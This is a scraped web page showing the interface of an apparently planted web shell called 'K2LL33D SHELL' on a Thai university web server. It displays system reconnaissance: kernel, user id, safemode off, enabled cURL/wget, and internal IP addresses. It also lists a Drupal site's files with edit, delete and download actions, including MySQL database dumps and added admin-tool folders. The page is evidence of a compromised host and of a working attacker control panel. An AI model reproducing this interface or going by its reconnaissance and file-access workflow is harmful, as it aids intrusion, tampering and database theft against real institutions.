ข่าวสาร

กิจกรรม

k2ll33d
  

K2LL33D SHELL

 Apache
 Linux sdu-host03.dusit.ac.th 2.6.32-504.8.1.el6.x86_64 #1 SMP Wed Jan 28 21:11:36 UTC 2015 x86_64
 uid=48(www) gid=48(www) groups=48(www)
 safemode : OFF
 MySQL: ON | Perl: ON | cURL: ON | WGet: ON
  >  / webhost / DusitOrg / bizcom / public_html / 2011 /
server ip : 10.140.0.3

your ip : 10.140.0.252

H O M E


www $
view file/folder
namesizeowner:grouppermsmodifiedactions
.- ????:????
rwxr-xr-x
22-Sep-2015 11:15 newfile | newfolder
- ????:????
rwxr-xr-x
22-Sep-2015 11:14 newfile | newfolder
css
DIR????:????
rwxr-xr-x
19-Mar-2013 19:24rename| delete
includes
DIR????:????
rwxr-xr-x
29-Sep-2013 08:51rename| delete
js
DIR????:????
rwxr-xr-x
19-Mar-2013 19:24rename| delete
misc
DIR????:????
rwxr-xr-x
29-Sep-2013 08:47rename| delete
modules
DIR????:????
rwxr-xr-x
29-Sep-2013 08:47rename| delete
phpadmin
DIR????:????
rwxr-xr-x
22-Sep-2015 11:15rename| delete
profiles
DIR????:????
rwxr-xr-x
07-Jun-2011 22:43rename| delete
restore-06012515
DIR????:????
rwxr-xr-x
22-Sep-2015 11:15rename| delete
scripts
DIR????:????
rwxr-xr-x
29-Sep-2013 08:47rename| delete
sites
DIR????:????
rwxr-xr-x
22-Sep-2015 11:14rename| delete
sqlbuddy
DIR????:????
rwxr-xr-x
22-Sep-2015 11:14rename| delete
themes
DIR????:????
rwxr-xr-x
29-Sep-2013 08:51rename| delete
tmp
DIR????:????
rwxr-xr-x
02-Apr-2014 16:23rename| delete
.gitignore
174????:????
rw-r--r--
02-Apr-2014 16:34 edit | rename| delete | download (gz)
.htaccess
5.63 kb????:????
rw-r--r--
02-Apr-2014 16:34 edit | rename| delete | download (gz)
2013-09-29T10-00-46.mysql.gz
6.29 mb????:????
rw-r--r--
29-Sep-2013 10:21 edit | rename| delete | download (gz)
2013-09-29T10-13-19.mysql
19.77 mb????:????
rw-r--r--
29-Sep-2013 10:26 edit | rename| delete | download (gz)
CHANGELOG.txt
84.08 kb????:????
rw-r--r--
02-Apr-2014 16:34 edit | rename| delete | download (gz)
COPYRIGHT.txt
1.45 kb????:????
rw-r--r--
02-Apr-2014 16:34 edit | rename| delete | download (gz)
INSTALL.mysql.txt
1.42 kb????:????
rw-r--r--
02-Apr-2014 16:34 edit | rename| delete | download (gz)
INSTALL.pgsql.txt
1.83 kb????:????
rw-r--r--
02-Apr-2014 16:34 edit | rename| delete | download (gz)
INSTALL.sqlite.txt
1.27 kb????:????
rw-r--r--
02-Apr-2014 16:34 edit | rename| delete | download (gz)
INSTALL.txt
17.57 kb????:????
rw-r--r--
02-Apr-2014 16:34 edit | rename| delete | download (gz)
LICENSE.txt
17.67 kb????:????
rw-r--r--
02-Apr-2014 16:34 edit | rename| delete | download (gz)
MAINTAINERS.txt
8 kb????:????
rw-r--r--
02-Apr-2014 16:34 edit | rename| delete | download (gz)
README.txt
5.25 kb????:????
rw-r--r--
02-Apr-2014 16:34 edit | rename| delete | download (gz)
UPGRADE.txt
9.42 kb????:????
rw-r--r--
02-Apr-2014 16:34 edit | rename| delete | download (gz)
authorize.php
6.45 kb????:????
rw-rw-r--
02-Apr-2014 16:34 edit | rename| delete | download (gz)
cron.php
720????:????
rw-rw-r--
02-Apr-2014 16:34 edit | rename| delete | download (gz)
index.ph_
21.25 kb????:????
rw-r--r--
04-Jan-2015 10:28 edit | rename| delete | download (gz)
index.php
529????:????
rw-rw-r--
02-Apr-2014 16:34 edit | rename| delete | download (gz)
install.php
703????:????
rw-rw-r--
02-Apr-2014 16:34 edit | rename| delete | download (gz)
license.txt
768????:????
rw-r--r--
02-Apr-2014 16:34 edit | rename| delete | download (gz)
robots.txt
1.52 kb????:????
rw-r--r--
02-Apr-2014 16:34 edit | rename| delete | download (gz)
update.php
19.52 kb????:????
rw-rw-r--
02-Apr-2014 16:34 edit | rename| delete | download (gz)
web.config
2.13 kb????:????
rw-r--r--
02-Apr-2014 16:34 edit | rename| delete | download (gz)
xmlrpc.php
417????:????
rw-rw-r--
02-Apr-2014 16:34 edit | rename| delete | download (gz)